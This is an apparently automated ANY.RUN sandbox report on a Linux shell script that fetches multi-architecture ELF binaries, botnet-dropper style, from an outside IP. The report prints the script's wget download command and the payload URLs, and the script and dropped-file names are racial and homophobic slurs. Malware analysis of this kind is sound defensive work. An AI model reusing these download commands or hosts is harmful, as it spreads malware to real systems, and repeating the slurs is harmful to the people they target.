Malware analysis /nigga.sh Malicious activity | ANY.RUN

Add for printing

download:	/nigga.sh
Full analysis:	https://app.any.run/tasks/68470f4a-7ee4-438e-8f36-ffa17300d51e
Verdict:	Malicious activity
Analysis date:	February 12, 2024, 12:27:02
OS:	Ubuntu 22.04.2
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	02CA458377F0CD5C8CEA667446F7395A
SHA1:	C6C9E71F172390FCB9F27532722CDC03B066B16F
SHA256:	F38AF6A22BB7031F7CA1534199A3D055E5C8BCE226604C2A24E7A1FAE7864CFC
SSDEEP:	24:U95xi9SfNq7PE7mRmi0FIXNNIeGFUiF7qXXoNZULKaXKE5ZL:Uw9Slq7PEqRmiZx6VxqXXoNiLKaXKE7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Modifies file or directory owner
  - sudo (PID: 7937)
- Uses wget to download content
  - bash (PID: 7941)
- Executes commands using command-line interpreter
  - sudo (PID: 7940)
- Checks DMI information (probably VM detection)
  - systemd-hostnamed (PID: 8003)
INFO
- Manipulating modules (likely to execute programs on system boot)
  - modprobe (PID: 7950)
  - modprobe (PID: 7962)
  - modprobe (PID: 7958)
  - modprobe (PID: 7970)
  - modprobe (PID: 7966)
- Intercepts program crashes
  - apport (PID: 7954)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

261

Monitored processes

41

Malicious processes

0

Suspicious processes

0

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
7936	/bin/sh -c "sudo chown user \"/tmp/nigga\.sh\" && chmod +x \"/tmp/nigga\.sh\" && DISPLAY=:0 sudo -iu user \"/tmp/nigga\.sh\" "	/bin/sh	—	any-guest-agent
User: user Integrity Level: UNKNOWN Exit code: 0
7937	sudo chown user /tmp/nigga.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
7938	chown user /tmp/nigga.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
7939	chmod +x /tmp/nigga.sh	/usr/bin/chmod	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
7940	sudo -iu user /tmp/nigga.sh	/usr/bin/sudo	—	sh
User: user Integrity Level: UNKNOWN Exit code: 0
7941	-bash --login -c \/tmp\/nigga\.sh	/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
7942	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
7943	wget -O lol http://192.3.152.183/mips	/usr/bin/wget	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
7948	chmod +x lmao	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 496
7949	-bash --login -c \/tmp\/nigga\.sh	/usr/bin/bash	—	bash
User: user Integrity Level: UNKNOWN Exit code: 496

Add for printing

Executable files

0

Suspicious files

0

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
7943	wget	/tmp/lol		—
		MD5:—	SHA256:—
7951	wget	/tmp/faggot		—
		MD5:—	SHA256:—
7954	apport	/var/log/apport.log		—
		MD5:—	SHA256:—
7954	apport	/apport.lock		—
		MD5:—	SHA256:—
7955	wget	/tmp/gay		—
		MD5:—	SHA256:—
7959	wget	/tmp/retard		—
		MD5:—	SHA256:—
7963	wget	/tmp/nigger		—
		MD5:—	SHA256:—
7967	wget	/tmp/shit		—
		MD5:—	SHA256:—
7971	wget	/tmp/nigga		—
		MD5:—	SHA256:—
7990	nautilus	/home/user/.local/share/nautilus/tags/meta.db-wal		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

9

TCP/UDP connections

19

DNS requests

10

Threats

8

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	91.189.91.98:80	http://connectivity-check.ubuntu.com/	unknown	—	—	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/mpsl	unknown	binary	34.8 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm	unknown	binary	32.6 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm5	unknown	binary	31.2 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/mips	unknown	binary	33.7 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/x86_64	unknown	binary	33.3 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm6	unknown	binary	36.5 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/arm7	unknown	binary	57.4 Kb	unknown
—	—	GET	200	192.3.152.183:80	http://192.3.152.183/i586	unknown	binary	30.4 Kb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	224.0.0.251:5353	—	—	—	unknown
—	—	91.189.91.98:80	—	Canonical Group Limited	US	unknown
—	—	91.189.91.49:80	—	Canonical Group Limited	US	unknown
—	—	212.102.56.182:443	—	Datacamp Limited	DE	unknown
—	—	192.3.152.183:80	—	AS-COLOCROSSING	US	unknown
—	—	45.155.91.135:21425	—	—	PH	unknown
—	—	156.146.33.138:443	—	Datacamp Limited	DE	unknown
—	—	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	unknown

DNS requests

Domain	IP	Reputation
58.100.168.192.in-addr.arpa	—	unknown
api.snapcraft.io	185.125.188.54 185.125.188.55 185.125.188.59 185.125.188.58	unknown
connectivity-check.ubuntu.com	2620:2d:4002:1::198 2001:67c:1562::24 2620:2d:4000:1::2b 2620:2d:4000:1::22 2001:67c:1562::23 2620:2d:4000:1::96 2620:2d:4000:1::2a 2620:2d:4002:1::197 2620:2d:4000:1::23 2620:2d:4000:1::98 2620:2d:4002:1::196 2620:2d:4000:1::97	unknown

Threats

PID	Process	Class	Message
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
—	—	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP

Add for printing

No debug info

General Info

/nigga.sh

02CA458377F0CD5C8CEA667446F7395A

C6C9E71F172390FCB9F27532722CDC03B066B16F

F38AF6A22BB7031F7CA1534199A3D055E5C8BCE226604C2A24E7A1FAE7864CFC

24:U95xi9SfNq7PE7mRmi0FIXNNIeGFUiF7qXXoNZULKaXKE5ZL:Uw9Slq7PEqRmiZx6VxqXXoNiLKaXKE7

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

SUSPICIOUS

Modifies file or directory owner

Uses wget to download content

Executes commands using command-line interpreter

Checks DMI information (probably VM detection)

INFO

Manipulating modules (likely to execute programs on system boot)

Intercepts program crashes

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings